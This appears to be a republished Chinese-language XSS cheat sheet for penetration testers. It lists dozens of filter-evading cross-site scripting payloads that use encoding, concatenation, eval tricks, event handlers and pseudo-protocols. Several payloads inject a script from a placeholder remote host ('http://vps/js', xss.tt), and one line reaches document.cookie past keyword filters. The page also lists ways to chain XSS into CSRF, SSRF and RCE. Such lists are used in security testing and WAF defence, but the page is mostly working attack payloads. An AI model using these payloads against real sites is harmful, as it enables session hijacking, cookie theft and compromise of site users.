39

XSS Cheat Sheet

 3 years ago
source link: https://www.tuicool.com/articles/zqaUNbE
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

如果碰到没遇到或者不知道的,建议大家先Google、看文档。

首先大家可以先看下这个网站:

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

如果测试的时候在这个网站上找不到可以利用的方法的话,那…emmm…就放弃吧。

nAziM32.jpg!web

下面是我在工作中常用的一些方法,全部都来自网络上的各个表哥的无私分享,我先替我自己说声谢谢了。

1. 拼接

拼接函数:

top、this、self、parent、frames、content、window

比如:

<body/onfocus=top.alert(1)>
<bodyonpageshow=top['confir'%2b'm'](1)>
<audiosrc/onerror=self['pro'+'mpt'](1)>
<detailsontoggle=this['ale'+'rt']`1`open>
<marqueeonstart=top.eval('ale'%2B'rt(1)')>
<img/src=1onerror=window.alert(1)>
<svgonload="a(this);function a(){}(alert`1`)">

2. 编码

常见的编码类型:URL编码、base64编码、Hex编码、JS8编码、JS16编码、Unicode编码、html编码

既然是编码肯定需要一些函数来执行,比如:eval,setTimeout,setInterval,constructor,execScript(IE)等

# URL
<imgsrc="x"onerror="eval(unescape('%61%6c%65%72%74%28%31%29'))">
<detailsopenontoggle=eval('%61%6c%65%72%74%28%31%29') >
<detailsopenontoggle=%65%76%61%6c(atob('YWxlcnQoMSk=')) >
# base64
<details open ontoggle=eval(atob('YWxlcnQoMSk='))>
# JS8
<body onpageshow=content['\141\154\145\162\164'](1)>
<svg/onload=setTimeout('\141\154\145\162\164\50\61\51')>
# JS16
<bodyonpageshow=frames['\x61\x6c\x65\x72\x74'](1)>
<svg/onload=Set.constructor`al\x65rt\x281\x29```>
<svg/onload=Map.constructor`al\x65rt\x281\x29```>
<svg/onload=clear.constructor`al\x65rt\x281\x29```>
<svg/onload=Array.constructor`al\x65rt\x281\x29```>
<svg/onload=WeakSet.constructor`al\x65rt\x281\x29```>
# unicode
<ahref="javascript:al\u0065rt()">XSS Test</a>
<ahref="javascript:al\u{65}rt()">XSS Test</a>
<svg/onload=\u0073etInterval('\141\154\145\162\164\50\61\51')>
<svg/onload=setTimeout`prompt\u00281\u0029`>
# Ascii
<img/src=1onerror="eval(String.fromCharCode(97,108,101,114,116,40,49,41))">

3. 字符串

利用正则表达式返回字符串

eval('~a~le~rt~~(~~1~~)~'.replace(/~/g, ''))
eval(/~a~le~rt~~(~~1~~)~/.source.replace(/~/g, new String()))
<ahref="javascript:window[/alert/.source]()">XSS Test</a>
<ahref="javascript:''.replace(/.*/,alert)">XSS Test</a>
<imgsrc=1onerror=eval('~a~le~rt~~(~~1~~)~'.replace(/~/g, ''))>

利用toString转换字符串。

整数 toString(radix) 转字符串, 第一个点表示浮点数,第二个点表示调用函数

<ahref="javascript:top[8680439..toString(30)]()">XSS Test</a>
<detailsopenontoggle=top[8680439..toString(30)](1);>
<detailsopenontoggle=top[11189117..toString(32)](1);>

alert 字符串用 parseInt 函数,以基数为30转化后为8680439

parseInt('alert',30) == 8680439

toString 函数将返回的数字8680439,以基数为30还原

8680439..toString(30) == alert

4. 函数多样调用

<ahref="javascript:alert.call(null,'param')">XSS Test</a>
<ahref="javascript:alert.apply(null,['param'])">XSS Test</a>
<ahref="javascript:alert.bind()('param')">XSS Test</a>
<ahref="javascript:Reflect.apply(alert,null,['param'])">XSS Test</a>
<ahref="javascript:setTimeout`alert\x28\x29`">XSS Test</a>
<ahref="javascript:eval(atob())">XSS Test</a>
<ahref="javascript:eval(String.fromCharCode(97,108,))">XSS Test</a>
<imgsrc=1onerror=(function(){alert(1)})()>
<imgsrc=1onerror=!function(){alert(1)}()>
<imgsrc=1onerror=%2bfunction(){alert(1)}()>
<imgsrc=1onerror=%2dfunction(){alert(1)}()>
<imgsrc=1onerror=~function(){alert(1)}()>
<ahref="javascript:(alert)()">XSS Test</a>
模板字符串:反引号``
<ahref="javascript:`${alert(1)}`">XSS Test</a>

5. 利用数组等的功能函数

<ahref="javascript:[''].find(alert`1`)">XSS Test</a>
<ahref="javascript:[''].findIndex(alert(1)">XSS Test</a>
<ahref="javascript:[''].filter(alert)">XSS Test</a>
<ahref="javascript:[''].forEach(alert)">XSS Test</a>
<ahref="javascript:(new Map()).set(1,'').forEach(alert)">XSS Test</a>
<ahref="javascript:(new Set([''])).forEach(alert)">XSS Test</a>

利用拼接数组函数

concat() 不仅仅可以用于连接两个或多个数组,还可以合并两个或者多个字符串

<svg/onload=location='javas'.concat('cript:ale','rt(1)')>
<iframeonload=s=createElement('script');body.appendChild(s);s.src='http://v'.\u0063oncat('ps/','js'); >

再补充个有些防护过滤了 document.cookie 可以试下下面的,很爽的

document['coo'['CONCAT'.toLowerCase()]('kie')]

join() 将数组转换成字符串

<iframeonload=location=['javascript:alert(1)'].join(")>

6. 新建函数

<ahref="javascript:(new Function('alert()'))()">XSS Test</a>
<body/onload=Function(alert(1))()>
<img%0Dsrc=1onerror=Function(alert(1))>
<ahref="javascript:Set.constructor`alert\x28\x29```">XSS Test</a>
<ahref="javascript:(new (Object.getPrototypeOf(async function(){}).constructor)('alert()'))()">XSS Test</a>

7. location

location 对象的 hash 属性用于设置或取得 URL 中的锚部分,比如: http://localhost/1.php#alert(1) ,我们在控制台输入 location.hash ,则会返回我们设定的 ,即 #alert(1)

再结合 slice()substr() 等字符串处理函数获取字符串

<body/onload=eval(location.hash.slice(1))>#alert(1)
<body/onload=setTimeout(location.hash.substr(1))()>#alert(1)
<body/onload=Set.constructor(location.hash.substr(1))()>#alert(1)
<body/onload=execScript(location.hash.substr(1))>#alert(1)
使用Function匿名函数来执行尾部的代码
<body/onload=Function(location.hash.slice(1))()>#alert(1)

同样的道理 location.search 也类似,它可以把部分参数放在 ? 之后

# dom.html
<html>
  <body>
    <script>
document.write(decodeURI(window.location.search));
</script>
  </body>
</html>
# payload
dom.html?<svg/onload=alert(1)

1.php?(1)&code=<img/src=1 onerror=a=location.search;location="javascript:alert"+a[1]+a[2]+a[3]>

再比如:

<svgonload=eval(URL.slice(-8))>#alert(1)

9. 伪协议

常见的伪协议有: javascript:vbscript: (IE下), data:

<body/onload=eval(location.hash.slice(1))>#javascript:alert(1)
<body/onload=eval(location.hash.slice(1))>#vbscript:msgbox(1)
<ahref="javascript:confirm(1)">XSS Test</a>
<iframesrc="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(1)">
<objectdata="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
<iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4=">
<video><sourceonerror="javascript:confirm(1);">
<imgsrc=1onerror=location="javascript:alert(1)">
# 使用xmlns属性
<svg/onload="javascript:alert(1)"xmlns="http://www.baidu.com">
# 使用注释
<svg/onload=location='javascript:/*'%2blocation.hash> #*/alert(1)
# innerHTML
<svg/onload=location="javascript:"%2binnerHTML%2blocation.hash>"  #"-alert(1)

10. unescape

unescape() 函数用于对已经使用 escape() 函数编码的字符串进行解码,并返回解码后的字符串。

很多会拦截外部 url ,比如拦截 //

<svg/onload=appendChild(createElement('script')).src=unescape('http%3A%2F%2Fxss.tt%2F1te')>

11. with

with 用来引用某个特定对象中已有的属性,使用with可以实现通过节点名称的对象调用。

如果 . 被拦截,可以使用 with 替代。

<svg/onload=with(location)with(hash)eval(alert(1))>

基于DOM的方法创建和插入节点把外部JS文件注入到网页中,也可以应用with。

<svg/onload="[1].find(function(){with(`docom'|e|'nt`);;body.appendChild(createElement('script')).src='http://vps/js'})">

12. 过滤括号

<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
<img/src=1onerror="top.onerror=alert; throw 1">
<imgsrc=xonerror=alert`1`>
<imgsrc=1onerror=alert%28%29>
<imgsrc=1onerror=location="javascript:"+"aler"+"t%281%29">

13. 引用外部url

创建和插入节点把外部JS文件注入到网页

<detailsopenontoggle=eval("appendChild(createElement('script')).src='http://vps/js'")>
<iframeonload=s=createElement('script');body.appendChild(s);s.src='http://v'.concat('ps/','js');>
<body/onload=document.write(String.fromCharCode(60,115,67,114,73,112,116,32,115,114,67,61,104,116,116,112,58,47,47,118,112,115,47,106,115,62,60,47,115,67,82,105,112,84,62))>
利用link
<linkrel=importhref="http://vps/1.js">

14. 赋值

# 变量
<img/src=1onerror=_=alert,_(1)>
<styleonload=_=alert;_(1)>
<details/open/ontoggle=_=alert;x=1;_`1`>
<detailsopenontoggle=top[a='al',b='ev',b%2ba](prompt(1))>
<detailsopenontoggle=top[a='al',b='ev',b%2ba]('\141\154\145\162\164\50\61\51')>
<detailsopenontoggle=top[a='meout',b='setTi',b%2ba]('\141\154\145\162\164\50\61\51')>
# 函数
<img/src=1onmouseover="a=alert,a`1`">
# 属性
<imgsrc=1alt=allang=ertonerror=top[alt%2blang](1)>

15. 黑名单

alert(1) 为例

(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
self[/al/.source+/ert/.source](1)
al\u0065rt(1)
frames['al\145rt'](1)
content[8680439..toString(30)](1)

16. 标签

16.1. body

<bodyonload=alert(1)>
<bodyonpageshow=alert(1)>
<bodyonfocus=alert(1)>
<bodyonhashchange=alert(1)><ahref=#></a>
<bodystyle=overflow:auto;height:1000pxonscroll=alert(1)id=x>#x
<bodyonscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><xid=x>#x

16.2. 其他

<marqueeonstart=alert(1)>
<marqueeloop=1width=0onfinish=alert(1)>
<audiosrconloadstart=alert(1)>
<videoonloadstart=alert(1)><source>
<inputautofocusonblur=alert(1)>
<keygenautofocusonfocus=alert(1)>
<formonsubmit=alert(1)><inputtype=submit>
<selectonchange=alert(1)><option>1<option>2
<menuid=xcontextmenu=xonshow=alert(1)>right click me!

太多了,再次提醒大家好好看看这个网站:

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

17. 事件捕获

<xcontenteditableonblur=alert(1)>lose focus!
<xonclick=alert(1)>click this!
<xoncopy=alert(1)>copy this!
<xoncontextmenu=alert(1)>right click this!
<xoncut=alert(1)>copy this!
<xondblclick=alert(1)>double click this!
<xondrag=alert(1)>drag this!
<xcontenteditableonfocus=alert(1)>focus this!
<xcontenteditableoninput=alert(1)>input here!
<xcontenteditableonkeydown=alert(1)>press any key!
<xcontenteditableonkeypress=alert(1)>press any key!
<xcontenteditableonkeyup=alert(1)>press any key!
<xonmousedown=alert(1)>click this!
<xonmousemove=alert(1)>hover this!
<xonmouseout=alert(1)>hover this!
<xonmouseover=alert(1)>hover this!
<xonmouseup=alert(1)>click this!
<xcontenteditableonpaste=alert(1)>paste here!
<brutecontenteditableonblur=alert(1)>lose focus!
<bruteonclick=alert(1)>click this!
<bruteoncopy=alert(1)>copy this!
<bruteoncontextmenu=alert(1)>right click this!
<bruteoncut=alert(1)>copy this!
<bruteondblclick=alert(1)>double click this!
<bruteondrag=alert(1)>drag this!
<brutecontenteditableonfocus=alert(1)>focus this!
<brutecontenteditableoninput=alert(1)>input here!
<brutecontenteditableonkeydown=alert(1)>press any key!
<brutecontenteditableonkeypress=alert(1)>press any key!
<brutecontenteditableonkeyup=alert(1)>press any key!
<bruteonmousedown=alert(1)>click this!
<bruteonmousemove=alert(1)>hover this!
<bruteonmouseout=alert(1)>hover this!
<bruteonmouseover=alert(1)>hover this!
<bruteonmouseup=alert(1)>click this!
<brutecontenteditableonpaste=alert(1)>paste here!
<brutestyle=font-size:500pxonmouseover=alert(1)>0000
<brutestyle=font-size:500pxonmouseover=alert(1)>0001
<brutestyle=font-size:500pxonmouseover=alert(1)>0002
<brutestyle=font-size:500pxonmouseover=alert(1)>0003

18. 属性

# src
<scriptsrc=javascript:alert(1)>
<iframesrc=javascript:alert(1)>
<embedsrc=javascript:alert(1)>
# href
<ahref=javascript:alert(1)>click
<math><brutehref=javascript:alert(1)>click
# action
<formaction=javascript:alert(1)><inputtype=submit>
<isindexaction=javascript:alert(1)type=submitvalue=click>
# formaction
<form><buttonformaction=javascript:alert(1)>click
<form><inputformaction=javascript:alert(1)type=submitvalue=click>
<form><inputformaction=javascript:alert(1)type=imagevalue=click>
<form><inputformaction=javascript:alert(1)type=imagesrc=http://brutelogic.com.br/webgun/img/youtube1.jpg>
<isindexformaction=javascript:alert(1)type=submitvalue=click>
# data
<objectdata=javascript:alert(1)>
# srcdoc
<iframesrcdoc=%26lt;svg/o%26%23x6Eload%26equals;alert%26lpar;1)%26gt;>
# xlink:href
<svg><scriptxlink:href=data:,alert(1)></script>
<svg><scriptxlink:href=data:,alert(1)/>
<math><brutexlink:href=javascript:alert(1)>click
# from
<svg><axmlns:xlink=http://www.w3.org/1999/xlinkxlink:href=?><circler=400/><animateattributeName=xlink:hrefbegin=0from=javascript:alert(1)to=%26>

渗透测试常见利用手法

  • XSS + CSRF
  • XSS + 文件上传
  • XSS + SSRF
  • XSS + DOS
  • XSS + RCE
  • XSS + NTLMhash
  • XSS + 文件读取
  • 。。。

案例我已经字字血泪的帮大家都整理好了,自取。

渗透测试之XSS漏洞利用案例大全(尊享版): https://ml.mk/Tjc


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK